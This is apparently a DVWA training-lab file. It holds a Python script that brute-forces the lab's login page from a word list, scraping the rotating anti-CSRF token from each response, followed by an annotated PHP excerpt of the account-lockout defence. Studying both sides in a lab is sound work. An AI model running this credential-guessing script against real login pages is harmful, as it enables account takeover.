def access_once(password):
    """Send one login request with ``password`` and act on the response.

    Uses the module-level request settings ``u`` (URL), ``h`` (headers),
    ``p`` (query parameters) and ``flag`` (success marker), and mutates
    ``p`` in place. The script is stopped with ``exit()`` when the success
    marker is found, or when the response is not the "Brute Force" page.
    Otherwise the ``user_token`` value carried in the response is copied
    into ``p`` for the next request.

    The token rotates with every response but is handed to whoever
    requests the page, so it protects against cross-site request forgery
    rather than against repeated guessing; attempt throttling or account
    lockout is the control that bounds the latter.
    """
    p["password"] = password
    response = requests.get(url=u, headers=h, params=p)
    body = response.text

    # Success marker present: the submitted password was accepted.
    if flag in body:
        print("[+] Password Found: %s" % password)
        exit()

    # Page title missing: we were sent back to the login page, which the
    # original author attributes to a rejected token.
    if "Vulnerability: Brute Force" not in body:
        print("Not in the target page, plz reset the initial token")
        exit()

    print("Testing: %s" % password)
    # Fixed-offset extraction of the next token: 19 characters past the
    # start of "user_token", 32 characters long (the length of the initial
    # token). Presumably matches name='user_token' value='...' markup -
    # TODO confirm. A missing marker (find() == -1) is not detected here.
    token_start = body.find("user_token") + 19
    p["user_token"] = body[token_start:token_start + 32]
def brute_force(dic_path):
    """Pass every non-empty line of the word list to ``access_once``.

    NOTE(review): ``dic_path`` is accepted but never read; the word list is
    always loaded from the hard-coded ``"test.txt"``, and the file object
    is left for the interpreter to close.
    """
    wordlist_lines = open("test.txt").read().split('\n')
    for candidate in wordlist_lines:
        if candidate == '':
            # Blank lines (including the one after a trailing newline)
            # are not submitted.
            continue
        access_once(candidate)
if __name__ == '__main__':
    # URL of the lab page under test (a DVWA path on a private address).
    u = "http://192.168.249.129/dvwa/vulnerabilities/brute/"

    # Session cookie sent with every request; it also carries security=high.
    h = {"Cookie": "PHPSESSID=crc8f16n12orl898p045cdtvg7; security=high"}

    # GET parameters. "password" is overwritten per attempt, and
    # "user_token" starts from a value that has to be obtained by hand
    # and is then refreshed from each response.
    p = {
        "username": "admin",
        "password": "123",
        "Login": "Login",
        "user_token": "310efbd56d1e4f90f8f4fdfacae910b8",
    }

    # Text whose presence in the response marks a successful login.
    flag = "Welcome to the password protected area admin"

    # Path of the word list.
    dictionary = "test.txt"
    brute_force(dictionary)
// Check the database (Check user information)
// Reads the failure counter and last-login time for the submitted username.
// The username is bound to the :user placeholder rather than concatenated
// into the SQL text, so it reaches the database as a value.
$data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
// fetch() returns false when no row matches, so $row must not be indexed
// before the row count has been checked.
$row = $data->fetch();
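// Check to see if the user has been locked out.
// Applies only when the lookup returned exactly one row and that row's
// failure counter has reached the configured threshold.
if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) ) {
    // Calculate when the user would be allowed to login again.
    // last_login is converted to a Unix timestamp once and the lockout
    // window is added as seconds. The earlier form passed the timestamp
    // back through strtotime() as "<integer> +N minutes"; a bare integer
    // is not a date format strtotime() documents (Unix timestamps need an
    // "@" prefix), so the computed deadline was not reliable.
    // NOTE(review): if last_login cannot be parsed, strtotime() returns
    // false and the window is treated as already elapsed - confirm the
    // column is always populated.
    $last_login = strtotime( $row[ 'last_login' ] );
    $timeout    = $last_login + ( $lockout_time * 60 );
    $timenow    = time();

    // Keep the account locked while the window is still open. The previous
    // comparison ( $timenow > $timeout ) set the flag only after the
    // window had passed, the opposite of what its own comment described.
    if( $timenow < $timeout ) {
        $account_locked = true;
    }
}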
// Check the database (if username matches the password)
// Both values are bound to placeholders, so neither is spliced into the
// SQL text.
// NOTE(review): $pass is compared directly against the stored column; how
// it was derived from the submitted password (hashing, salting) is outside
// this excerpt - confirm it is not plaintext.
$data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR);
$data->bindParam( ':password', $pass, PDO::PARAM_STR );
$data->execute();
// $row is the matching record, or false when the pair does not match.
$row = $data->fetch();
// Had the account been locked out since last login?
// When the failure counter has reached the threshold, append a notice with
// the attempt count and the time of the last attempt to the page output.
// NOTE(review): both values are interpolated without HTML escaping;
// presumably they come from the users row - confirm.
// NOTE(review): "${last_login}" is the ${var} interpolation form, deprecated
// as of PHP 8.2; "{$last_login}" produces the same text.
if( $failed_login >= $total_failed_login ) {
    $html .= "<p><em>Warning</em>: Someone might of been brute forcing your account.</p>"
        . "<p>Number of login attempts: <em>{$failed_login}</em>.<br />Last login attempt was at: <em>${last_login}</em>.</p>";
}
// Update bad login count
// Increments the failure counter for the submitted username; presumably
// this runs on the failed-login path - the surrounding branch is outside
// this excerpt.
// The counter is keyed on the username alone, so lockout bounds guessing
// against one account at the cost of that account's availability while
// failures keep arriving; per-source throttling is the usual complement.
// LIMIT on UPDATE is MySQL-style syntax.
$data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();